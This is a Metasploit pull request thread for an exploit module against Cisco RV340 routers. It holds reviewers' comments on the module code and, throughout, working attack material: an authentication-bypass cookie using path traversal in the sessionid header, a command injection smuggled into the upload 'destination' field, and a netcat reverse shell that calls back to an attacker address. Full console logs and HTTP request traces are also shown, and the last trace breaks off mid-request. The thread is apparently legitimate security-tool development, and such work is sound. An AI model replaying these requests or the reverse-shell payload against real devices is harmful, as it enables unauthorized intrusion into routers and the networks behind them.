Cisco RV LAN Exploit
rapid7/metasploit-framework pull request #17599
Opened 2023-02-05 19:37 UTC by neterum

Module exploits multiple authentication bypasses and a command injection to achieve code execution on Cisco RV340x Small Business Routers under the www-data user.  Vulnerable up to, and tested against, firmware version 1.0.03.24. Version 1.0.03.26 removes these vulnerabilities.  

Utilizes vulnerabilities from CVEs 2022-20701, 2022-20705,  and 2022-20707 for RCE.  

Credit to Biem Pham at Sea Security for weaponizing the exploits.  

Credit to jbaines-r7 as most code in this module was adapted from cisco_rv_series_authbypass_and_rce.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use modules/exploits/linux/http/cisco_rv340_lan`
- [ ] `set lhost <listening ip>`
- [ ] `set rhost <target ip>`
- [ ] `exploit`
- [ ] Exploit will print out `Exploit successfully executed` and verify with "id" command
- [ ] Non-vulnerable versions (1.0.03.26 and above) will not create a session

## Reverse Netcat Output
```
msf6 > use modules/exploits/linux/http/cisco_rv340_lan
[*] Using configured payload cmd/unix/reverse_netcat
msf6 exploit(linux/http/cisco_rv340_lan) > set lhost 192.168.1.142
lhost => 192.168.1.142
msf6 exploit(linux/http/cisco_rv340_lan) > set rhost 192.168.1.1
rhost => 192.168.1.1
msf6 exploit(linux/http/cisco_rv340_lan) > exploit

[*] Started reverse TCP handler on 192.168.1.142:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The device responded to exploitation with a 200 OK.
[*] Executing Unix Command for cmd/unix/reverse_netcat
[*] Command shell session 1 opened (192.168.1.142:4444 -> 192.168.1.1:55885) at 2023-02-05 10:06:22 -0500
[+] Exploit successfully executed.

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

```
## Linux Dropper

```
msf6 > use modules/exploits/linux/http/cisco_rv340_lan
[*] Using configured payload cmd/unix/reverse_netcat
msf6 exploit(linux/http/cisco_rv340_lan) > set lhost 192.168.1.142
lhost => 192.168.1.142
msf6 exploit(linux/http/cisco_rv340_lan) > set rhost 192.168.1.1
rhost => 192.168.1.1
msf6 exploit(linux/http/cisco_rv340_lan) > set target 1
target => 1
msf6 exploit(linux/http/cisco_rv340_lan) > exploit

[*] Started reverse TCP handler on 192.168.1.142:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The device responded to exploitation with a 200 OK.
[*] Executing Linux Dropper for linux/armle/meterpreter/reverse_tcp
[*] Using URL: http://192.168.1.142:8080/3b2NfBKR0OS
[*] Client 192.168.1.1 (Wget) requested /3b2NfBKR0OS
[*] Sending payload to 192.168.1.1 (Wget)
[*] Sending stage (934728 bytes) to 192.168.1.1
[+] Exploit successfully executed.
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Meterpreter session 2 opened (192.168.1.142:4444 -> 192.168.1.1:55950) at 2023-02-05 10:12:37 -0500
[*] Server stopped.

meterpreter > shell
Process 11012 created.
Channel 1 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

```

PCAPs will be emailed to [msfdev@metasploit.com](mailto:msfdev@metasploit.com)

2023-02-06 00:44 UTC, jvoisin commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +                        'data' => '{"jsonrpc": "2.0", "method": "login", "params": {"user": "bienpnn", "pass": "bienpnn"}}'
The string `bienpnn` should be randomized.

2023-02-06 00:44 UTC, jvoisin commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +    filename = 'bienpnn'
Please randomize this as well :)

2023-02-06 00:44 UTC, jvoisin commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +    fileparam = 'bienpnn'
Please randomize this as well :)

2023-02-06 00:44 UTC, jvoisin commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +    destination = '\'; ' + cmd + " #"
This can be replaced with `destination = "';" + cmd + "#" I think

2023-02-06 00:44 UTC, jvoisin commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +          [ 'CVE', '2022-20701'],
According to ZDI, this is a privesc: https://www.zerodayinitiative.com/advisories/ZDI-22-412/

I've this module is making use of it, it should be declared as "privileged", and its description should be updated to reflect this.

2023-02-06 00:44 UTC, jvoisin commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +          [ 'CVE', '2022-20705'],
You might want to add a reference to https://www.zerodayinitiative.com/advisories/ZDI-22-410/ (and maybe a comment saying that this is the file-upload path-traversal?)

2023-02-06 00:44 UTC, jvoisin commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +          [ 'CVE', '2022-20707']
You might want to add a reference to https://www.zerodayinitiative.com/advisories/ZDI-22-409/ (and maybe a comment saying that this is the auth bypass?)

2023-02-06 02:43 UTC, neterum commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +                        'data' => '{"jsonrpc": "2.0", "method": "login", "params": {"user": "bienpnn", "pass": "bienpnn"}}'
Done :)

2023-02-06 02:44 UTC, neterum commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +    filename = 'bienpnn'
Done :)

2023-02-06 02:44 UTC, neterum commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +    fileparam = 'bienpnn'
Done :)

2023-02-06 02:44 UTC, neterum commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +    destination = '\'; ' + cmd + " #"
Thanks for suggestion.  Added change.

2023-02-06 02:45 UTC, neterum commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +          [ 'CVE', '2022-20701'],
Removed reference to this CVE as I have not added privilege escalation vuln to this module. Apologies for confusion.

2023-02-06 02:49 UTC, neterum commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +          [ 'CVE', '2022-20705'],
Added reference.  Wouldn't classify as file-upload, but path-traversal that leads to authentication bypass.

2023-02-06 02:50 UTC, neterum commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +          [ 'CVE', '2022-20707']
Added reference.

2023-02-08 22:27 UTC, gwillcox-r7 requested changes

2023-02-08 22:27 UTC, gwillcox-r7 commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +        'Cookie' => 'sessionid =../../../etc/passwd; sessionid=aaaaaaaaaaaaaaaa'
This string of a's could likely be randomized.

2023-02-08 22:27 UTC, gwillcox-r7 commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +      return CheckCode::Appears('The device responded to exploitation with a 200 OK.')
Uh this is checking for a 301 moved permanently code in the body? I'm confused here. If we are checking the response code we should be checking `res.code` here.

2023-02-08 22:27 UTC, gwillcox-r7 commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +      fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
This logic looks off. If there is no response at all, we shouldn't be responding with an UnexpectedReply. See https://docs.metasploit.com/docs/development/developing-modules/libraries/handling-module-failures-with-fail_with.html#comprehensive-list-of-fail_with-parameters. You should be failing with `Failure::Unreachable` if the target cannot be reached or `Failure::Disconnected` if the target suddenly stops responding after responding earlier.

2023-02-08 22:27 UTC, gwillcox-r7 commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +      body_json = res.get_json_document
I think this should be in a `begin...rescue` statement last I checked? See https://github.com/rapid7/metasploit-framework/blob/a9bd7e9f469b2af76da17cf086ec01ce9629aac9/modules/exploits/windows/http/gitstack_rce.rb#L79-L84 for an example of what I'm thinking here.

This is because you are running a JSON parser on untrusted input from a random system. This could lead to exceptions or errors when trying to parse malformed input so you should always be sure to include exception handling whenever your trying to parse input you don't fully control yourself.

2023-02-09 00:37 UTC, neterum commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +    pathparam = 'Configuration'
I was unable to randomize either.  Attempted all with no luck:

```
filepath = Rex::Text.rand_text_alphanumeric(5..12)
filepath = '/tmp/' + Rex::Text.rand_text_alphanumeric(5..12)
filepath = '/tmp/upload.' + Rex::Text.rand_text_alphanumeric(5..12)
```

 Saved documentation I have states that `file.path: path to a temporary file (for uploading). Must exist and writable by www-data (for mv command). Usually just put /tmp/upload.input (which is the temporary file)`

Also attempted to randomize `pathparam` with no luck.

2023-02-09 01:38 UTC, neterum commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +      return CheckCode::Appears('The device responded to exploitation with a 200 OK.')
If an exploit packet is successful, the packet itself returns a successful response 200, but the body of the packet will also include the `301 Moved Permanently`.  It is just how the router responds.  
![Response](https://user-images.githubusercontent.com/16675549/217692951-c7226359-7a62-4a34-8db3-86a38d8f734a.PNG)

2023-02-09 01:55 UTC, neterum commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +      fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
The first `fail_with` is a generic fail if the response is anything other than a 200 ok.  I can spell out specific `fail_with` matching response codes to metasploit documentation if need be.  The second `fail_with` focuses on the fact that vulnerable routers are utilizing JSON-RPC for communication.  I will changed the second `fail_with` to `Failure::NotFound` as that failure occurs because a required resource for exploitation is missing from the device.

2023-02-09 02:02 UTC, neterum commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +          This module works on firmware versions 1.0.03.24 and below
Two authentication bypasses are not required for successful exploitation.  I personally did not question this when adapting previous python exploitation code for this module.  As such, the module now only sends one request to the router, instead of two, removing the first unnecessary authentication bypass.  I believe the original author of the python exploit was just demonstrating multiple authentication bypasses in his/her code.  This description and CVE listing will be cleaned up.

2023-02-09 02:08 UTC, neterum commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +      body_json = res.get_json_document
I am leaving `return nil` in my module as well, unless there is a `fail_with` that fits this scenario.  Perhaps `fail_with(Failure::Unkown` ?

2023-02-09 02:12 UTC, neterum commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +          [ 'ZDI', '22-411']  # Command Injection
If you are referring to CVE-2022-20707, I do not believe the vulnerability to be an authentication bypass. The command injection requires authentication.  However, I have cleaned up this section, and the module explanation, in the next commit.

2023-02-09 02:24 UTC, neterum commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +              'Payload' => {},
Sloppiness on my part, added so both have `BadChars` section.

2023-02-09 02:25 UTC, neterum commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +        'Cookie' => 'sessionid =../../../etc/passwd; sessionid=aaaaaaaaaaaaaaaa'
Updated with hardcoded length of 16, exploit fails otherwise.  Tested with lengths of 14, 15, 16, and 17.

2023-02-09 15:03 UTC, bwatters-r7 reviewed
Could you send us the output of the exploit on the terminal with `HttpTrace` set to true?  It will let us see the requests without having to fiddle with SSL.

2023-02-09 19:57 UTC, gwillcox-r7 commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +    pathparam = 'Configuration'
So the concern with this that that error message raises is that we are modifying existing files on disk as part of this exploit. This in turn raises the following questions:

1. If it is requiring an existing file on disk, would it not be possible to have the user supply a file and then use that if it exists?
2. The `check` method should not be doing anything that could modify files and be as minimally invasive on the target as possible. Doing stuff like modifying files is going to be highly observable and will likely violate a lot of assumptions that our users have about a typical `check` operation's behavior.

2023-02-09 20:39 UTC, gwillcox-r7 commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +          [ 'ZDI', '22-411']  # Command Injection
Ah okay fair point I guess what you could do is set this up to run after the module executes but I imagine that may be better suited for a separate post exploitation module.

I also meant to delete this comment before leaving the review as this was more a note to myself when reviewing things of something to double check, but later found that it wasn't a concern. Sorry for the confusion!

2023-02-09 20:44 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/cisco_rv340_lan.md
> +1. Install the vulnerable firmware
New documentation looks great @neterum thanks for providing this. I'll try break this down into a list format since I think that will be a little easier to read, but otherwise the extra information provided here is very helpful, appreciated!

2023-02-09 21:04 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/cisco_rv340_lan.md
> +### Reverse Netcat Output
I'll go ahead and fix this up.

2023-02-09 21:12 UTC, neterum commented on documentation/modules/exploit/linux/http/cisco_rv340_lan.md
> +### Reverse Netcat Output
Apologies if my most recent commit still wasn't up to standards.  Thank you.

2023-02-09 21:19 UTC, gwillcox-r7 commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +        'Cookie' => 'sessionid =../../../etc/passwd; sessionid=aaaaaaaaaaaaaaaa'
On a related note does this need to be `/etc/passwd`? This will look highly suspicious in logs.

2023-02-09 21:25 UTC, gwillcox-r7 commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +      return CheckCode::Appears('The device responded to exploitation with a 200 OK.')
I think the wording here is not appropriate as realistically what your actually checking for here is that it responded with 200 OK and that it had the right body contents. The message implies that you just checked it had a 200 OK response, not that you also did these body content checks.

2023-02-09 21:28 UTC, gwillcox-r7 commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +      fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
I'd prefer if you can break it down as that would allow us to be more specific with our codes, which is something we try to do as much as possible.

2023-02-09 21:29 UTC, gwillcox-r7 commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +      fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
If we could do specific `fail_with` codes where possible that would be much appreciated 👍

2023-02-09 21:32 UTC, gwillcox-r7 commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +      body_json = res.get_json_document
`Failure::Unknown` would make sense if you legitimately had no idea what caused things to fail. In this case you know that its failing cause the JSON data returned by the target is not parsing correctly so `Failure::UnexpectedReply` would probably make more sense here.

2023-02-09 21:35 UTC, gwillcox-r7 commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +        'Platform' => ['Linux', 'Unix'],
Fixed in f2a86327d0b2e2511fb985fdcedb50784e2b67ea

2023-02-09 21:35 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/cisco_rv340_lan.md
> +1. Install the vulnerable firmware
Fixed up to use a list format n some minor edits in f2a86327d0b2e2511fb985fdcedb50784e2b67ea.

2023-02-10 01:09 UTC, neterum commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +    pathparam = 'Configuration'
I examined my device to see what is being created during exploitation phase.  Below is after successful exploitation.  Each file listed in `/tmp/upload` is created during the `check` method.  My assumption is that a file is created anytime a "non-shell" command is sent to the router.     

```
[+] Exploit successfully executed.

id 
uid=33(www-data) gid=33(www-data) groups=33(www-data)
cd /tmp/upload
ls -al
drwxr-xr-x    2 www-data www-data       640 Feb  9 19:50 .
drwxrwxrwt   39 root     root          1920 Feb  9 19:53 ..
-rw-rw-rw-    1 www-data www-data        10 Feb  5 21:31 0000000001
-rw-rw-rw-    1 www-data www-data        10 Feb  5 21:32 0000000002
-rw-rw-rw-    1 www-data www-data         9 Feb  5 21:37 0000000004
-rw-rw-rw-    1 www-data www-data        10 Feb  5 21:38 0000000006
-rw-rw-rw-    1 www-data www-data         7 Feb  7 20:23 0000000008
-rw-rw-rw-    1 www-data www-data        11 Feb  8 19:24 0000000010
-rw-rw-rw-    1 www-data www-data         9 Feb  8 19:26 0000000011
-rw-rw-rw-    1 www-data www-data         7 Feb  8 19:29 0000000012
-rw-rw-rw-    1 www-data www-data         5 Feb  8 19:31 0000000014
-rw-rw-rw-    1 www-data www-data         5 Feb  8 19:33 0000000015
-rw-rw-rw-    1 www-data www-data        12 Feb  8 19:50 0000000016
-rw-rw-rw-    1 www-data www-data        10 Feb  8 20:23 0000000018
-rw-rw-rw-    1 www-data www-data         6 Feb  8 20:27 0000000021
-rw-rw-rw-    1 www-data www-data         8 Feb  8 20:31 0000000023
-rw-rw-rw-    1 www-data www-data        10 Feb  8 20:31 0000000024
-rw-rw-rw-    1 www-data www-data         8 Feb  8 20:32 0000000025
-rw-rw-rw-    1 www-data www-data         6 Feb  8 20:34 0000000026
-rw-rw-rw-    1 www-data www-data        11 Feb  8 20:34 0000000028
-rw-rw-rw-    1 www-data www-data        11 Feb  8 20:59 0000000031
-rw-rw-rw-    1 www-data www-data        11 Feb  8 21:00 0000000033
-rw-rw-rw-    1 www-data www-data        12 Feb  8 21:13 0000000035
-rw-rw-rw-    1 www-data www-data        12 Feb  9 19:08 0000000037
-rw-rw-rw-    1 www-data www-data         8 Feb  9 19:14 0000000039
-rw-rw-rw-    1 www-data www-data        10 Feb  9 19:16 0000000041
-rw-rw-rw-    1 www-data www-data         7 Feb  9 19:25 0000000044
-rw-rw-rw-    1 www-data www-data         5 Feb  9 19:31 0000000045
-rw-rw-rw-    1 www-data www-data         9 Feb  9 19:37 0000000047
-rw-rw-rw-    1 www-data www-data        12 Feb  9 19:48 0000000049
-rw-rw-rw-    1 www-data www-data         6 Feb  9 19:48 0000000050
-rw-rw-rw-    1 www-data www-data         5 Feb  9 19:50 0000000051
cat 0000000051
zZeAr

```

1.  The `check` method actually exploits the router and sends `'; id #` as the command to the router
2. The router returns `uid=33(www-data) gid=33(www-data) groups=33(www-data)` along with the `301 Moved Permanently` body
3. A file is created during this process and contains a string present in the `input` variable of the module
4. The module then exploits the router again with `'; mkfifo /tmp/jxsop; nc 192.168.1.142 4444 0</tmp/jxsop | /bin/sh >/tmp/jxsop 2>&1; rm /tmp/jxsop #`
5. A file is NOT created during this process. 

I tried removing the `input` line from the module, but that resulted in a failed exploit.  

So here's my request for guidance on this issue.  Should I either build a simpler `check` method that does not exploit the router, or allow the `check` method to exploit the router, but figure out another `cmd` that won't create a file in the `/tmp/upload/` folder?

2023-02-10 01:09 UTC, neterum commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +        'Cookie' => 'sessionid =../../../etc/passwd; sessionid=aaaaaaaaaaaaaaaa'
No, and I will find a much less suspicious file for my next commit.

2023-02-10 01:19 UTC, neterum commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +      return CheckCode::Appears('The device responded to exploitation with a 200 OK.')
Okay I understand your confusion now.  I will clean this up on next commit.

2023-02-10 01:19 UTC, neterum commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +      fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
Roger that!

2023-02-10 22:31 UTC, gwillcox-r7 commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +        'Cookie' => 'sessionid =../../www/index.html; sessionid=' + sessionid
Sorry I should have been clearer here, I'm pretty sure this can just be randomized?

2023-02-10 22:33 UTC, gwillcox-r7 commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +    return CheckCode::Unknown("Didn't receive a response from the target.") if res.nil?
`.blank?` might be a better check here. This will also account for if `res` is simply an empty response, whereas `.nil?` will only handle the case where res is `nil`.

2023-02-10 22:35 UTC, gwillcox-r7 commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +      return CheckCode::Appears('The device responded to exploitation with a 200 OK.')
The line `'The device responded to exploitation with a 200 OK.'` should become `'The device responded to exploitation with a 200 OK and a message body containing the appropriate 301 response text.'` or something to this effect.

2023-02-10 22:38 UTC, gwillcox-r7 commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +      body_json = res.get_json_document
Update looks good! Marking resolved 👍

2023-02-10 22:53 UTC, gwillcox-r7 commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +      fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
Error here still exists.

2023-02-10 22:57 UTC, gwillcox-r7 commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +        'Cookie' => 'sessionid =../../../etc/passwd; sessionid=aaaaaaaaaaaaaaaa'
As mentioned below randomization may be better here.

2023-02-10 23:01 UTC, gwillcox-r7 commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +    pathparam = 'Configuration'
If you can build a simpler `check` method that does not exploit the router that would be the most ideal scenario and would remove a lot of our concerns. If this is not possible then the second solution you suggested of figuring out another command that you can use to positively ID the target as being vulnerable without dropping files would be the next best solution.

2023-02-11 22:44 UTC, neterum commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +    return CheckCode::Unknown("Didn't receive a response from the target.") if res.nil?
This code no longer exists in latest commit.

2023-02-11 22:51 UTC, neterum commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +        'Cookie' => 'sessionid =../../www/index.html; sessionid=' + sessionid
Cannot randomize.  The vulnerable code, which allows bypassing authentication, can be exploited by inserting a known file into the sessionid header. If this file is present on the system, the session check will pass.

2023-02-11 22:53 UTC, neterum commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +      fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
That chunk of code was partially modified, and I also added your above request to the code.

2023-02-11 22:54 UTC, neterum commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +      return CheckCode::Appears('The device responded to exploitation with a 200 OK.')
Rewrote the check portion of the code, eliminating the need for this response.

2023-02-11 22:54 UTC, neterum commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +        'Cookie' => 'sessionid =../../../etc/passwd; sessionid=aaaaaaaaaaaaaaaa'
Mentioned below and copied my response here: The vulnerable code, which allows bypassing authentication, can be exploited by inserting a known file into the sessionid header. If this file is present on the system, the session check will pass.

2023-02-11 22:59 UTC, neterum commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +    pathparam = 'Configuration'
Rewrote check method.  I couldn't fine an efficient way to identify the router, so my check is still exploiting the router.  However, it only exploits the authentication bypass vulnerability present in the firmware.  If the authentication bypass exists, then the command injection must also be present.  Note that the authentication bypass does not create any files on the disk.

2023-02-13 17:10 UTC, gwillcox-r7 commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +        'Cookie' => 'sessionid =../../www/index.html; sessionid=' + sessionid
Sounds good, this is acceptable given these circumstances. Marking this as resolved.

2023-02-13 17:22 UTC, gwillcox-r7 commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +      fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
Looks good now, marking resolved.

2023-02-13 17:46 UTC, gwillcox-r7 commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +        'Cookie' => 'sessionid =../../../etc/passwd; sessionid=aaaaaaaaaaaaaaaa'
Yep makes sense this was more of a double check. Current values make sense given existing requirements.

2023-02-13 19:56 UTC, gwillcox-r7 requested changes
Left some comments, going to go ahead and try resolve as many of these as I can myself and upload the changes.

2023-02-13 19:56 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/cisco_rv340_lan.md
> +to execute code on Cisco RV340x Small Business Routers as the `www-data` user. The command injection occurs in the `upload.cgi` script,
In your main exploit you say this only affects RV340 and RV345 routers yet here you say its affects RV340 routers only. Looks like a disgrepancy.

2023-02-13 19:56 UTC, gwillcox-r7 commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +          Small Business Routers, allowing attackers to gain remote shell access with www-data user privileges.
```suggestion
          Small Business Routers, allowing attackers to execute arbitrary commands with www-data user privileges.
```

2023-02-13 19:56 UTC, gwillcox-r7 commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +                'BadChars' => '\''
We should move this into the `Payload` section as I think that is the proper place for this.

2023-02-13 19:56 UTC, gwillcox-r7 commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +  # of 16 or exploit will fail.  Tested with lengths
```suggestion
  # of 16 or exploit will fail. Tested with lengths
```

2023-02-13 19:56 UTC, gwillcox-r7 commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +    # A proper "upload" will trigger file creation.  So created above is an incorrect "upload" call to avoid file
```suggestion
    # A proper "upload" will trigger file creation. So the send_request_cgi call above is an incorrect "upload" call to avoid creating a file.
```

2023-02-13 19:56 UTC, gwillcox-r7 commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +    # creation. The router return a status code 405 Not Allowed if authentication has been bypassed by above request.
```suggestion
    # creation. The router will return status code 405 Not Allowed if authentication has been bypassed by the above request.
```

2023-02-13 19:56 UTC, gwillcox-r7 commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +      return CheckCode::Unknown('The target responded in such a way that exploitation in unknown and unlikely.')
```suggestion
      return CheckCode::Unknown('The target responded in an unexpected way. Exploitation is unlikely.')
```

2023-02-13 19:56 UTC, gwillcox-r7 commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +    # Failure::NotVulnerable if 403 Forbidden is status code
```suggestion
    # Successful unix_cmd shells should not produce a response. However if one is returned, check it and throw
    # Failure::NotVulnerable if 403 Forbidden is the status code.
```

2023-02-13 19:56 UTC, gwillcox-r7 commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +    end
This logic will fall through if `res` is `nil` and the target type is `unix_cmd` to the `print_good` line. Need to apply the same `fail_with(Failure::Unreachable` logic here.

2023-02-13 19:56 UTC, gwillcox-r7 commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +        return nil
Should probably replace this with a `fail_with(Failure::UnexpectedReply` failure vs returning `nil` here like this.

2023-02-13 19:56 UTC, gwillcox-r7 commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +    # of 16 or exploit will fail.  Tested with lengths
```suggestion
    # of 16 or exploit will fail. Tested with lengths
```

2023-02-13 19:56 UTC, gwillcox-r7 commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +    filepath = '/tmp/upload.input'
Should add a comment here explaining why this can't be randomized for future travelers.

2023-02-13 19:56 UTC, gwillcox-r7 commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +    destination = "'; " + cmd + ' #'
Correct me if I am wrong but would this not also make `#` and `;` bad characters in your payload? Seems like the bad character list is incomplete.

2023-02-13 20:15 UTC, gwillcox-r7 commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +          Small Business Routers, allowing attackers to gain remote shell access with www-data user privileges.
This is important since in theory they could use it to gain a shell, but they could also use it for other activities that don't require a shell.

2023-02-13 21:11 UTC, gwillcox-r7 approved these changes

2023-02-13 21:12 UTC, gwillcox-r7 commented
@neterum Per https://github.com/rapid7/metasploit-framework/pull/17599#pullrequestreview-1291312638 can you send the result of running the module with `set HTTPTRACE true` so we can see the unencrypted HTTP requests and responses?

Thanks!

2023-02-13 22:28 UTC, neterum commented on documentation/modules/exploit/linux/http/cisco_rv340_lan.md
> +to execute code on Cisco RV340x Small Business Routers as the `www-data` user. The command injection occurs in the `upload.cgi` script,
Apologies for discrepancies.  I have only tested against my own RV340 router. But I agree the information should be in the module.

2023-02-13 22:54 UTC, neterum commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +    end
The successful exploitation during unix_cmd does not produce a response (res).  I was also unaware of the '&' operator after objects.  I pushed a commit modifying this check.  The target is not vulnerable if a 403 is received.

2023-02-13 22:57 UTC, gwillcox-r7 commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +    end
My bad forgot about that and made a bad edit as a result. Good spotting and this fix looks good! Marking this as resolved.

2023-02-13 23:03 UTC, neterum commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +                'BadChars' => '\'#;'
The `;` character can be used  as many times as required by unix command and file dropper.  I believe it should be allowed.  Agreed on `#` being in `BadChars` list.

2023-02-13 23:05 UTC, neterum commented
## HttpTrace output for Unix Cmd:

```
msf6 exploit(linux/http/cisco_rv340_lan) > set httptrace true
httptrace => true
msf6 exploit(linux/http/cisco_rv340_lan) > exploit

[*] Started reverse TCP handler on 192.168.1.142:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
####################
# Request:
####################
GET /upload HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13.1; rv:108.0) Gecko/20100101 Firefox/108.0
Cookie: sessionid =../../www/index.html; sessionid=Fa3UiVziP7lw2d3e


####################
# Response:
####################
HTTP/1.1 405 Not Allowed
Server: nginx
Date: Mon, 13 Feb 2023 22:46:18 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 166
Connection: keep-alive
Keep-Alive: timeout=5
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=31536000; includeSubDomains

<html>
<head><title>405 Not Allowed</title></head>
<body bgcolor="white">
<center><h1>405 Not Allowed</h1></center>
<hr><center>nginx</center>
</body>
</html>

[+] The target appears to be vulnerable. The device is vulnerable to authentication bypass. Likely also vulnerable to command injection.
[*] Executing Unix Command for cmd/unix/reverse_netcat
####################
# Request:
####################
POST /upload HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13.1; rv:108.0) Gecko/20100101 Firefox/108.0
Cookie: sessionid =../../www/index.html; sessionid=LbhLEnzmnrzeU6j9
Content-Type: multipart/form-data; boundary=---------------------------043359517597719330678698655971
Content-Length: 974

-----------------------------043359517597719330678698655971
Content-Disposition: form-data; name="file.path"

/tmp/upload.input
-----------------------------043359517597719330678698655971
Content-Disposition: form-data; name="filename"

MrrEfRoeZQ
-----------------------------043359517597719330678698655971
Content-Disposition: form-data; name="pathparam"

Configuration
-----------------------------043359517597719330678698655971
Content-Disposition: form-data; name="fileparam"

9nnPZY6
-----------------------------043359517597719330678698655971
Content-Disposition: form-data; name="destination"

'; mkfifo /tmp/mlkzhb; nc 192.168.1.142 4444 0</tmp/mlkzhb | /bin/sh >/tmp/mlkzhb 2>&1; rm /tmp/mlkzhb #
-----------------------------043359517597719330678698655971
Content-Disposition: form-data; name="input"; filename="MrrEfRoeZQ"
Content-Type: application/octet-stream

9Hr4Urb61j
-----------------------------043359517597719330678698655971--

[*] Command shell session 1 opened (192.168.1.142:4444 -> 192.168.1.1:37774) at 2023-02-13 17:46:24 -0500
####################
# Response:
####################
No response received
[+] Exploit successfully executed.

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)


```

## HttpTrace for File Dropper:

```
msf6 exploit(linux/http/cisco_rv340_lan) > set target 1 
target => 1
msf6 exploit(linux/http/cisco_rv340_lan) > exploit

[*] Started reverse TCP handler on 192.168.1.142:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
####################
# Request:
####################
GET /upload HTTP/1.1
